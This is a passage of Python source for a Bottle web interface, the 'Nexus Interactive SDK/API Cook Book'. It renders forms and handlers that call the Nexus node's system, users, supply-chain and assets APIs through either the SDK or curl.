does not exist - ' + \ 'login using users/login/user and click the SDK button').format(sid) return(None, show(output)) #enddef # # format_transactions # # Put a line per array element so the eyes can parse each transaction record # just a tad better. Used for most */list/* methods. # def format_transactions(data): if (data.has_key("result") == False): return(json.dumps(data)) if (data["result"] == None): return('{"error": "no json returned"}') output = json.dumps(data) return(output) #enddef # # no_parms # # Checks that any supplied arg in the variable list of arguments is "" or None. # def no_parms(*args): for a in args: if (a == "" or a == None): return(True) #endfor return(False) #enddef #------------------------------------------------------------------------------ show_html = ''' <br><table align="left" style="word-break:break-all;"> <tr><td>{}</td></tr> </table><br>&nbsp;<br><hr size="5"> ''' # # show # # This is JSON output returned from Nexus API. # def show(msg, sid="", genid=""): msg = red(msg) if (msg.find('"error":') != -1) else green(msg) output = show_html.format(bold(msg)) + build_body_page(sid, genid) hostname = blue(socket.gethostname()) sdk = blue(nexus_sdk_last_username) api = blue(nexus_api_last_username) return(landing_page.format(hostname, sdk, api, output)) #enddef # # Wrapper to make all web pages look alike, from a format perspective. # landing_page = ''' <html> <title>Nexus Interactive SDK/API Cook Book</title> <body bgcolor="gray"> <div style="margin:20px;background-color:#F5F5F5;padding:15px; border-radius:20px;border:5px solid #666666;"> <font face="verdana"><center> <br><head><a href="/" style="text-decoration:none;"><font color="black"> <b>Nexus Interactive SDK/API Cook Book</b></a></head><br> <font size="2""><br>Running on {}, last logged in SDK/API user {}/{}</font> <br><br><hr size="5"> {} <hr size="5"></center></font></body></html> ''' # # Used as a generic template for all API calls. Used for form input from # the web interface. # form_header = '<form action="/{}" method="post">' form_parm = '<input type="text" name="{}" value="{}" size="15" />' form_footer = ''' &nbsp;&nbsp;&nbsp;&nbsp; <input type="submit" value="SDK" name="action" /> &nbsp; <input type="submit" value="API" name="action" /> </form> ''' #------------------------------------------------------------------------------ # # build_url_html # # Put in two form lines for user to change SDK or API URL. # def build_url_html(o): global nexus_api_node, nexus_sdk_node o += "<br><b>Nexus Node URLs</b><br><br><table>" o += ''' <form action="/url/sdk" method="post"> SDK:&nbsp; <input type="text" name="url" value="{}" size="30" /> &nbsp; <input type="submit" value="Change URL" name="action" /> </form> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <form action="/url/api" method="post"> API:&nbsp; <input type="text" name="url" value="{}" size="30" /> &nbsp; <input type="submit" value="Change URL" name="action" /> </form> <br><br><hr size="5"> '''.format(nexus_sdk_node, nexus_api_node) return(o) #enddef # # build_system_html # system_get_info = '{}system/get/info{}' system_list_peers = '{}system/list/peers{}' system_list_lisp_eids = '{}system/list/lisp-eids{}' def build_system_html(sid, genid, o): f = form_footer o += "<br><b>System API</b><br><br><table>" o += "<tr><td>" h = form_header.format("system-get-info") o += hl(system_get_info).format(h, "<br><br>" + f) o += "</td>" o += "<td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>" o += "<td>" h = form_header.format("system-list-peers") o += hl(system_list_peers).format(h, "<br><br>" + f) o += "</td>" o += "<td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>" o += "<td>" h = form_header.format("system-list-lisp-eids") o += hl(system_list_lisp_eids).format(h, "<br><br>" + f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/system-get-info', method="post") def do_system_get_info(): action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init("system", "get/info", "") if (sdk == None): return(show(red("Could not initialize SDK"))) output = sdk.nexus_system_get_info() del(sdk) else: output = curl(system_get_info.format("", "")) #endif output = json.dumps(output) return(show(output)) #enddef @bottle.route('/system-list-peers', method="post") def do_system_list_peers(): action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init("system", "list/peers", "") if (sdk == None): return(show(red("Could not initialize SDK"))) output = sdk.nexus_system_list_peers() del(sdk) else: output = curl(system_list_peers.format("", "")) #endif output = json.dumps(output) return(show(output)) #enddef @bottle.route('/system-list-lisp-eids', method="post") def do_system_list_lisp_eids(): action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init("system", "lisp/lisp-eids", "") if (sdk == None): return(show(red("Could not initialize SDK"))) output = sdk.nexus_system_list_lisp_eids() del(sdk) else: output = curl(system_list_lisp_eids.format("", "")) #endif output = json.dumps(output) return(show(output)) #enddef #------------------------------------------------------------------------------ # # build_users_html # users_create_user = '{}users/create/user?username={}&password={}&pin={}{}' users_login_user = '{}users/login/user?username={}&password={}&pin={}{}' users_logout_user = '{}users/logout/user?session={}{}' users_lock_user = '{}users/lock/user?session={}{}' users_unlock_user = '{}users/unlock/user?session={}&pin={}{}' users_list_transactions = \ '{}users/list/transactions?genesis={}&page={}&limit={}&verbose={}{}' users_list_notifications = \ '{}users/list/notifications?genesis={}&page={}&limit={}{}' users_list_items = '{}users/list/items?genesis={}&page={}&limit={}{}' users_list_assets = '{}users/list/assets?genesis={}&page={}&limit={}{}' users_list_tokens = '{}users/list/tokens?genesis={}&page={}&limit={}{}' users_list_accounts = '{}users/list/accounts?genesis={}&page={}&limit={}{}' def build_users_html(sid, genid, o): f = form_footer o += "<br><b>Users API</b><br><br><table>" o += "<tr><td>" h = form_header.format("users-login-user") username = form_parm.format("username", "") password = form_parm.format("password", "") pin = form_parm.format("pin", "") o += hl(users_login_user).format(h, username, password, pin, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-logout-user") session = form_parm.format("session", sid) o += hl(users_logout_user).format(h, session, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-create-user") username = form_parm.format("username", "") password = form_parm.format("password", "") pin = form_parm.format("pin", "") o += hl(users_create_user).format(h, username, password, pin, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-lock-user") session = form_parm.format("session", sid) o += hl(users_lock_user).format(h, session, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-unlock-user") session = form_parm.format("session", sid) pin = form_parm.format("pin", "") o += hl(users_unlock_user).format(h, session, pin, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-transactions" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") verbose = form_parm.format("verbose", "default") o += hl(users_list_transactions).format(h, genesis, page, limit, verbose, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-notifications" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_notifications).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-items" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_items).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-assets" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_assets).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-tokens" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_tokens).format(h, genesis, page, limit, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-accounts" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") o += hl(users_list_accounts).format(h, genesis, page, limit, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/users-create-user', method="post") def do_users_create_user(): username = bottle.request.forms.get("username") password = bottle.request.forms.get("password") pin = bottle.request.forms.get("pin") if (no_parms(username, password, pin)): m = red("users/create/user needs more input parameters") return(show(m)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init(username, password, pin) output = sdk.nexus_users_create_user() else: output = curl(users_create_user.format("", username, password, pin, "")) #endif output = json.dumps(output) return(show(output)) #enddef @bottle.route('/users-login-user', method="post") def do_users_login_user(): global contexts global nexus_api_last_username, nexus_sdk_last_username username = bottle.request.forms.get("username") password = bottle.request.forms.get("password") pin = bottle.request.forms.get("pin") if (no_parms(username, password, pin)): m = red("users/login/user needs more input parameters") return(show(m)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init(username, password, pin) output = sdk.nexus_users_login_user() sid, genid = [sdk.session_id, sdk.genesis_id] contexts[sid] = sdk if (output.has_key("error") == False): nexus_sdk_last_username = username #endif else: output = curl(users_login_user.format("", username, password, pin, "")) sid = output["result"]["session"] if output.has_key("result") else "" genid = output["result"]["genesis"] if output.has_key("result") else "" if (output.has_key("error") == False): nexus_api_last_username = username #endif #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/users-logout-user', method="post") def do_users_logout_user(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("users/logout/user needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_users_logout_user() genid = sdk.genesis_id else: output = curl(users_logout_user.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/users-lock-user', method="post") def do_users_lock_user(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("users/lock/user needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_users_lock_user() genid = sdk.genesis_id else: output = curl(users_lock_user.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/users-unlock-user', method="post") def do_users_unlock_user(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") if (no_parms(pin, session)): m = red("users/unlock/user needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_users_unlock_user() genid = sdk.genesis_id else: output = curl(users_unlock_user.format("", session, pin, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/users-list-transactions', method="post") @bottle.route('/users-list-transactions/<sid>', method="post") def do_users_list_transactions(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") verbose = bottle.request.forms.get("verbose") if (no_parms(genesis, page, limit, verbose)): m = red("users/list/transactions needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_transactions_by_genesis(page, limit, verbose) else: output = curl(users_list_transactions.format("", genesis, page, limit, verbose, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-notifications', method="post") @bottle.route('/users-list-notifications/<sid>', method="post") def do_users_list_notifications(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/notifications needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_notifications_by_genesis(page, limit) else: output= curl(users_list_notifications.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-items', method="post") @bottle.route('/users-list-items/<sid>', method="post") def do_users_list_items(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/items needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_items_by_genesis(page, limit) else: output= curl(users_list_items.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-assets', method="post") @bottle.route('/users-list-assets/<sid>', method="post") def do_users_list_assets(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/assets needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_assets_by_genesis(page, limit) else: output= curl(users_list_assets.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-tokens', method="post") @bottle.route('/users-list-tokens/<sid>', method="post") def do_users_list_tokens(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/tokens needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_tokens_by_genesis(page, limit) else: output= curl(users_list_tokens.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef @bottle.route('/users-list-accounts', method="post") @bottle.route('/users-list-accounts/<sid>', method="post") def do_users_list_accounts(sid=""): genesis = bottle.request.forms.get("genesis") page = bottle.request.forms.get("page") limit = bottle.request.forms.get("limit") if (no_parms(genesis, page, limit)): m = red("users/list/accounts needs more input parameters") return(show(m, sid, genesis)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_users_list_accounts_by_genesis(page, limit) else: output= curl(users_list_accounts.format("", genesis, page, limit, "")) #endif output = format_transactions(output) return(show(output, sid, genesis)) #enddef #------------------------------------------------------------------------------ # # build_supply_html # supply_create_item = \ '{}supply/create/item?pin={}&session={}&name={}&data={}{}' supply_get_item_name = '{}supply/get/item?session={}&name={}{}' supply_get_item_address = '{}supply/get/item?session={}&address={}{}' supply_update_item = \ '{}supply/update/item?pin={}&session={}&address={}&data={}{}' supply_transfer_item = ('{}supply/transfer/item?pin={}&session={}' + \ '&address={}&destination={}{}') supply_claim_item = '{}supply/claim/item?pin={}&session={}&txid={}{}' supply_list_item_history_name = \ '{}supply/list/item/history?session={}&name={}{}' supply_list_item_history_address = \ '{}supply/list/item/history?session={}&address={}{}' def build_supply_html(sid, genid, o): f = form_footer o += "<br><b>Supply Chain API</b><br><br><table>" o += "<tr><td>" h = "supply-get-item-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(supply_get_item_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "supply-get-item-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(supply_get_item_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-create-item") pin = form_parm.format("pin", "") name = form_parm.format("name", "") data = form_parm.format("data", "") session = form_parm.format("session", sid) o += hl(supply_create_item).format(h, pin, session, name, data, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-update-item") pin = form_parm.format("pin", "") data = form_parm.format("data", "") session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(supply_update_item).format(h, pin, session, address, data, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-transfer-item") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) address = form_parm.format("address", "") d = form_parm.format("destination", "") o += hl(supply_transfer_item).format(h, pin, session, address, d, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("supply-claim-item") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") o += hl(supply_claim_item).format(h, pin, session, txid, f) o += "</td></tr>" o += "<tr><td>" h = "supply-list-item-history-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(supply_list_item_history_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "supply-list-item-history-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(supply_list_item_history_address).format(h, session, address, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/supply-create-item', method="post") def do_supply_create_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") data = bottle.request.forms.get("data") if (no_parms(pin, session, data)): m = red("supply/create/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_create_item(name, data) genid = sdk.genesis_id else: output = curl(supply_create_item.format("", pin, session, name, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-get-item-name', method="post") def do_supply_get_item_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("supply/get/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_get_item_by_name(name) genid = sdk.genesis_id else: output = curl(supply_get_item_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-get-item-address', method="post") def do_supply_get_item_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("supply/get/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_get_item_by_address(address) genid = sdk.genesis_id else: output = curl(supply_get_item_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-update-item', method="post") def do_supply_update_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") data = bottle.request.forms.get("data") if (no_parms(pin, session, address, data)): m = red("supply/update/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_update_item_by_address(address, data) genid = sdk.genesis_id else: output = curl(supply_update_item.format("", pin, session, address, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-transfer-item', method="post") def do_supply_transfer_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") dest = bottle.request.forms.get("destination") if (no_parms(pin, session, address, dest)): m = red("supply/transfer/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_transfer_item_by_address(address, dest) genid = sdk.genesis_id else: output = curl(supply_transfer_item.format("", pin, session, address, dest, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-claim-item', method="post") def do_supply_claim_item(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") if (no_parms(pin, session, txid)): m = red("supply/claim/item needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_claim_item(txid) genid = sdk.genesis_id else: output = curl(supply_claim_item.format("", pin, session, txid, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-list-item-history-name', method="post") def do_supply_list_item_history_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("supply/list/item/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_list_item_history_by_name(name) genid = sdk.genesis_id else: output = curl(supply_list_item_history_name.format("", session, name, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef @bottle.route('/supply-list-item-history-address', method="post") def do_supply_list_item_history_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("supply/list/item/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_supply_list_item_history_by_address(address) genid = sdk.genesis_id else: output = curl(supply_list_item_history_address.format("", session, address, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_assets_html # assets_create_asset = \ '{}assets/create/asset?pin={}&session={}&name={}&format=raw&data={}{}' assets_get_asset_name = '{}assets/get/asset?session={}&name={}{}' assets_get_asset_address = '{}assets/get/asset?session={}&address={}{}' assets_update_asset = \ '{}assets/update/asset?pin={}&session={}&address={}&data={}{}' assets_transfer_asset = \ '{}assets/transfer/asset?pin={}&session={}&address={}&destination={}{}' assets_claim_asset = '{}assets/claim/asset?pin={}&session={}&txid={}{}' assets_tokenize_asset = \ '{}assets/tokenize/asset?pin={}&session={}&token_name={}&asset_name={}{}' assets_list_asset_history_name = \ '{}assets/list/asset/history?session={}&name={}{}' assets_list_asset_history_address = \ '{}assets/list/asset/history?session={}&address={}{}' def build_assets_html(sid, genid, o): f = form_footer o += "<br><b>Assets API</b><br><br><table>" o += "<tr><td>" h = "assets-get-asset-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(assets_get_asset_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "assets-get-asset-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(assets_get_asset_address).format(h, session, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-create-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) data = form_parm.format("data", "") name = form_parm.format("name", "") o += hl(assets_create_asset).format(h, pin, session, name, data, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-update-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) data = form_parm.format("data", "") address = form_parm.format("address", sid) o += hl(assets_update_asset).format(h, pin, session, data, address, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-transfer-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) address = form_parm.format("address", "") d = form_parm.format("destination", "") o += hl(assets_transfer_asset).format(h, pin, session, address, d, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-claim-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) txid = form_parm.format("txid", "") o += hl(assets_claim_asset).format(h, pin, session, txid, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("assets-tokenize-asset") pin = form_parm.format("pin", "") session = form_parm.format("session", sid) token_name = form_parm.format("token_name", "") asset_name = form_parm.format("asset_name", "") o += hl(assets_tokenize_asset).format(h, pin, session, token_name, asset_name, f) o += "</td></tr>" o += "<tr><td>" h = "assets-list-asset-history-name" h = form_header.format(h) session = form_parm.format("session", sid) name = form_parm.format("name", "") o += hl(assets_list_asset_history_name).format(h, session, name, f) o += "</td></tr>" o += "<tr><td>" h = "assets-list-asset-history-address" h = form_header.format(h) session = form_parm.format("session", sid) address = form_parm.format("address", "") o += hl(assets_list_asset_history_address).format(h, session, address, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/assets-create-asset', method="post") def do_assets_create_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") data = bottle.request.forms.get("data") if (no_parms(pin, session, name, data)): m = red("assets/create/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_create_asset(name, data) genid = sdk.genesis_id else: output = curl(assets_create_asset.format("", pin, session, name, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-update-asset', method="post") def do_assets_update_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") data = bottle.request.forms.get("data") if (no_parms(pin, session, address, data)): m = red("assets/update/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_update_asset_by_address(address, data) genid = sdk.genesis_id else: output = curl(assets_update_asset.format("", pin, session, address, data, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-get-asset-name', method="post") def do_assets_get_asset_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("assets/get/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_get_asset_by_name(name) genid = sdk.genesis_id else: output = curl(assets_get_asset_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-get-asset-address', method="post") def do_assets_get_asset_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("assets/get/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_get_asset_by_address(address) genid = sdk.genesis_id else: output = curl(assets_get_asset_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-transfer-asset', method="post") def do_assets_transfer_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") dest = bottle.request.forms.get("destination") if (no_parms(pin, session, address, dest)): m = red("assets/transfer/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_transfer_asset_by_address(address, dest) genid = sdk.genesis_id else: output = curl(assets_transfer_asset.format("", pin, session, address, dest, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-claim-asset', method="post") def do_assets_claim_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") if (no_parms(session, txid)): m = red("assets/claim/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_claim_asset(txid) genid = sdk.genesis_id else: output = curl(assets_claim_asset.format("", pin, session, txid, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-tokenize-asset', method="post") def do_assets_tokenize_asset(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") token_name = bottle.request.forms.get("token_name") asset_name = bottle.request.forms.get("asset_name") if (no_parms(pin, session, token_name, asset_name)): m = red("assets/tokenize/asset needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_tokenize_asset_by_name(asset_name, token_name) genid = sdk.genesis_id else: output = curl(assets_tokenize_asset.format("", pin, session, token_name, asset_name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-list-asset-history-name', method="post") def do_assets_list_asset_history_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("assets/list/asset/history needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_assets_list_asset_history_by_name(name) genid = sdk.genesis_id else: output = curl(assets_list_asset_history_name.format("", session, name, "")) genid = "" #endif output = format_transactions(output) return(show(output, session, genid)) #enddef @bottle.route('/assets-list-asset-history-address', method="post") def do_assets_list_asset_history_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = 